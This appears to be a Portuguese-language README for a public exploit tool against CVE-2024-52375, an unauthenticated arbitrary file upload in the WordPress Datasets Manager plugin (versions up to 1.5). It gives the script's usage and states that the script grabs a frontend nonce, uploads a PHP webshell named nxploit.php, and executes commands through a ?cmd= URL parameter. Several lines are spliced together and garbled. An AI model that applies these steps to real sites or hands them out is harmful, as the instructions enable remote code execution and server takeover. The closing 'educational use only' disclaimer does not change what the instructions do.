
Plugin WordPress Datasets Manager por Arttia Creative <= 1.5 - Vulnerabilidade de Upload Arbitrário de Arquivo
💥 Exploit por: Nxploit (Khaled Alenazi)
📅 CVE Publicado: 14 de novembro de 2024
🧠 Pontuação CVSS: 10.0 (Crítico)
🛠 CWE-434: Upload sem Restrições de Arquivo com Tipo Perigoso
Uma vulnerabilidade crítica foi descoberta no plugin WordPress Datasets Manager by Arttia Creative, afetando todas as versões até 1.5 inclusive.
O plugin não valida corretamente os tipos de arquivo durante o processo de upload, permitindo que um atacante não autenticado envie arquivos arbitrários — incluindo shells PHP — e alcance Execução Remota de Código (RCE).
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:Hrequests:
pip install requests
usage: CVE-2024-52375.py [-h] -u URL
Exploit for WordPress Datasets Manager <= 1.5 - Arbitrary File Upload | By: Nxploit | Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Full target URL (e.g. http://target.com/wordpress)
Substitua a URL pelo caminho completo da instalação WordPress alvo.
Se bem-sucedido, o script irá:
_wpnonce público do frontend.nxploit.php.[+] Shell available at:
http://target.com/wordpress/wp-content/uploads/2025/03/nxploit.php
Você pode então executar comandos como:
http://target.com/wordpress/wp-content/uploads/2025/03/nxploit.php?cmd=id
readme.txt.<= 1.5 são vulneráveis.Esta ferramenta é fornecida apenas para fins educacionais e de testes autorizados.
Usá-la contra sistemas que você não possui ou sem permissão para testar é ilegal.